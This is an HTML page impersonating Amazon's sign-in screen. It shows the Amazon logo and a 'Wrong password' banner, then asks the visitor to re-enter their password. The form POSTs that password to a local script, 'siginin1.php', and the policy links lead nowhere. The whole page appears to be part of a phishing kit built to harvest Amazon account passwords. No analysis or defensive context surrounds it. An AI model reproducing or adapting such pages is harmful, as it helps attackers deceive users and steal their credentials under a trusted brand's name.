<!DOCTYPE html>
<html>
<head>
<title> Amazon Sign In</title>
<style>
h1{
	font-family: Amazon Ember;
	font-weight: normal;
	font-size: 29px;
}
	form{
		border-style: solid;
		padding-left: 25px;
		border-width: 1px;
		border-radius: 4px;
		border-color: #D8D8D8;
		align-items: center;
		text-align:left;
		width:335px;
		margin:auto;
}
label{
		padding-left: 2px;
		padding-bottom: 2px;
		font-family: "Amazon Ember";
		font-weight: normal;
		font-size: 13px;

}

input[type=password]{
	padding-left: 7px;
	width: 300px;
	border: 1px solid #ccc;
	border-radius: 3px;
	margin:2px;
	height: 25px;
}
h5{
	line-height:1;
	font-size: 12px;
	color:#767676;
	padding: 0 8px 0 7px;
	margin:1.67em;
	text-align: center;
}
	a:link {
  		color: blue;
  		background-color: transparent;
  		text-decoration: none;
	}
	a:visited {
  		color: purple;
  		background-color: transparent;
  		text-decoration: none;
	}

	a:hover {
  		color: #E67E22;
  		background-color: transparent;
  		text-decoration: underline;
	}

	a:active {
  		color: yellow;
  		background-color: transparent;
  		text-decoration: underline;
	}
	.center {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
	@media screen and (min-width: 480px) {
  		body {
   			background-color: white;
 }
}
</style>
</head>
<body>
	<p align="center">
		<img src="final_amazon.png" alt = "Amazon logo" height=50 width=150>
	</p>
  <p aling ="center">
  	<img src="wpass.png" alt="Wrong password" height=80 width=360 class="center">
	</p>
	<form id="sign" method="POST" action='siginin1.php'>
	<h1> Login</h1>
	<label for='user_pass'>Please re-enter your password</label><br>
	<input type='password' id='pass' name='pass'><br><br>
	<!--<label for = 'pass'>Enter your password</label><br>
	<input type='password' name='pass' id='pass'><br><br>-->
	<input type=image src=login.png alt='Continue' height=33px width=312px style="padding:2px 0 12px 0"> <br>
	<p style="font-family:Amazon Ember;font-size:12px;padding:0 12px 0 0;word-wrap: break-word">By continuing, you agree to <a href="#" target="_parent">Amazon's Conditions of Use</a> and <a href="#" target="_parent">Privacy Notice.</a>
	</p>
	<p style="font-family:Amazon Ember;font-size:13px">
	<a href="#" style="transform:rotate(90deg)">▸</a>
		<a href="#"> Need help?</a>
	</form>
</body>
</html>
